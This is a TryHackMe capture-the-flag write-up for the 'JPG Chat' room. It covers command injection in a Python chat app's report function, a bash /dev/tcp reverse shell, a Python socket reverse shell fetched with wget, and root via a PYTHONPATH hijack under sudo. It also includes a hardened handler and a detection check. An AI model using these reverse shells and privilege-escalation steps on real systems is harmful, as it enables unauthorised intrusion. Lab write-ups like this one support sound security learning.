TryHackMe: JPG Chat

DebianHat
5 min read · Mar 8, 2021

Content:

  1. Introduction
  2. Scanning and Enumeration
  3. Initial Footholds
  4. Exploitation
  5. Conclusion

Introduction:

First things first: the room logo itself suggests we are going to deal with some kind of Python program, or a vulnerability related to one, and as the name suggests it is going to be a chat/messaging application.
According to the THM tags the room is an easy boot-to-root machine; capturing the user flag and then the root flag completes the room.
With this initial info, let's dive in.

Scanning and Enumeration:

As always, once we deploy and boot the machine we are given its IP address. Let's start with an initial "nmap" scan to figure out which ports are open and which services are running on them.

$nmap -v -sV -sC [Machine-IP]

NMAP SCAN

The nmap scan shows port 22 and port 3000 open, running SSH and a service nmap labels ppp (actually JPGChat) respectively. The service on port 3000 is something unusual, worth enumerating further, and could provide the initial foothold, whereas SSH on port 22 is common and of no use as of now.

Further enumeration of port 3000: trying to access it through a browser or curl did not allow any interaction with the service, but connecting to port 3000 with "netcat" finally did.

$nc [Machine-IP] [Port]
In the report section, we get the admin name "Mozzie-jpg" and learn from that welcome message that the source code is available on GitHub.

Searching GitHub for that username leads to a repository holding JPGChat's source code.

Now that we have the source code, which as expected is Python, we review it to understand how the application works and, of course, to figure out how it can be exploited.

As expected, the code has vulnerabilities that can be used to get a shell on the box. Going through it, there is this report_form() function which echoes user-supplied parameters through bash, so it can be used to execute any other command as well.
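To make the flaw concrete from the fixing side, here is an added example (constructed for this writeup, not the JPGChat source) of a report handler that interpolates user text into a shell command, beside a version that never spawns a shell, plus a small review aid that flags reports carrying shell metacharacters:

```python
import os
import subprocess
import tempfile

# Constructed illustration, not the JPGChat code: the same "echo the report"
# behaviour implemented once through a shell and once without one.

def report_form_vulnerable(report: str) -> str:
    # The report text becomes part of a command line parsed by /bin/sh, so a
    # ';' ends the echo and whatever follows runs as a separate command.
    cmd = f"echo {report}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def report_form_hardened(report: str, log_path: str) -> str:
    # Fix: never hand user text to a shell. Append it to the report log with
    # ordinary file I/O; metacharacters are stored as literal characters.
    line = report.replace("\n", " ").strip()  # keep one report per line
    with open(log_path, "a", encoding="utf-8") as fh:
        fh.write(line + "\n")
    return line

def looks_like_injection(report: str) -> bool:
    # Review/detection aid: flags reports carrying shell metacharacters or the
    # redirection syntax used in the payload shown later in this writeup.
    markers = (";", "|", "&", "`", "$(", "/dev/tcp/")
    return any(m in report for m in markers)

def demo(report: str = "hi; echo INJECTED") -> dict:
    # Runs both handlers on the same constructed input and returns what each
    # produced, so the difference can be asserted rather than eyeballed.
    with tempfile.TemporaryDirectory() as tmp:
        log = os.path.join(tmp, "reports.log")
        stored = report_form_hardened(report, log)
        with open(log, encoding="utf-8") as fh:
            on_disk = fh.read()
    return {
        "vulnerable_stdout": report_form_vulnerable(report),
        "hardened_stored": stored,
        "hardened_on_disk": on_disk,
        "flagged": looks_like_injection(report),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable handler prints two lines for the constructed input because the shell split it into two commands; the hardened one stores the whole string as a single literal report.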

Initial Footholds:

By now we know that commands can be executed on the box through the report_form() function.
Let's get an initial shell by passing a bash reverse shell through that function.

$nc [Machine-IP] [Port]
$[REPORT]
$hi;bash -i >& /dev/tcp/{ip}/{port} 0>&1;

Don't forget to start a netcat listener first; otherwise there will be no shell prompt after the command executes.

Stabilize the shell using the old-school, most famous method: spawn a Python pty and export TERM as xterm.

$python3 -c 'import pty; pty.spawn("/bin/bash")'
$export TERM=xterm

Now we have a stable shell and can read the user flag.

$cat /home/wes/user.txt

Exploitation:

Before moving on to fancy scripts like LinEnum or LinPEAS, let's dig around a bit manually.

Check which sudo commands this user can run:
$sudo -l

Here we find two things: one is the Python environment path, and the other is a Python file that can be run as root. Moving on to read test_module.py, there is a module/library being imported (compare).

The file has read permissions, which makes reading it convenient.
It imports everything from the compare module.

After scratching my head for a while on how this can be exploited, env_keep+=PYTHONPATH clicks.
What we can do here is create a compare.py file containing a reverse shell and change PYTHONPATH to the directory containing that compare.py file.

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("[IP]",[PORT]))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty; pty.spawn("/bin/bash")

Python reverse shell.

Create the reverse shell as a file named compare.py in the /tmp directory and set PYTHONPATH to /tmp.
Again, don't forget to start the netcat listener.

$export PYTHONPATH=/tmp
$wget http://[your-IP]:[PORT]/compare.py

Run /opt/development/test_module.py with sudo rights, which pops a root shell.

$ sudo /usr/bin/python3 /opt/development/test_module.py

Boom we are root now.

Conclusion:

The room was an easy box with many things for beginners to learn: it shows how misconfigurations lead to exploitation and exercises a bit of code review, the way we reviewed the chat app code on GitHub.

  1. The machine was misconfigured regarding who can change the Python environment path.
  2. An application vulnerability: the way user input was handled and passed through bash.

Thank you for reading.
I hope it was helpful and that you learned something new. This was my way of solving the box; there could be other possible ways.
